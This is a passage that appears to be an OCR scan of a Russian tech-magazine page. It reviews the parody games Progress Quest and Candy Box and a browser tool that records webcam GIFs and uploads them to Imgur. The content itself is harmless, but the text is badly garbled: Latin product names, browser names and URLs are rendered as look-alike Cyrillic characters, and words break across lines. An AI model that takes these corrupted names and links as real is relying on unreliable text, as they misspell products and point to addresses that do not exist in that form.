Помнишь Ргодгезз Оиезі? Игрушка, больше всего похожая 
на табличку в ЕхсеІ, откровенно стебалась над фанатами РРС, 
помешанными на прокачке, однотипных квестах и луте. Сапбу 
Вох — более сложная вариация на ту же тему. Есть две ха- 
рактеристики — конфеты и леденцы, позволяющие покупать 
товары и прокачивать здоровье. У игры сформировалось не- 
большое, но преданное сообщество, а также вики, описываю- 
щее всю внутреннюю механику ( сапбѵЬох.ѵѵікіа.сот ). 



РАСЕТОСІР ( Ибгааотіг.аііНиЬ.іо/іасеІоаіЛ 

— Может так случиться, что в переписке или в обсуждении 
на форуме тебе захочется выразить всю глубину своих чувств 
характерным фейспалмом. Как сделать это по-быстрому? 

Тут приходит на помощь Тасе То діТ, простенькая тулза, по- 
зволяющая быстро записать через веб-камеру ноутбука 
гифку. Тут есть все, что нужно: четыре разрешения, возмож- 
ность поставить запись на паузу и функция автоматической 
загрузки на фотохостинг ітдиг. Файл также можно скачать. 

По умолчанию тулза делает довольно тяжелые гифки, по- 
этому желательно сжать картинку перед публикацией — впро- 
чем, это произойдет автоматически при публикации на ітдиг. 
И разумеется, нужен браузер, поддерживающий работу 
с веб-камерой, вроде последней версии СИгопле или Нге^ох. 




Простенькое веб- 
приложение, позволя- 
ющее записать с веб- 
камеры СІР-файл 
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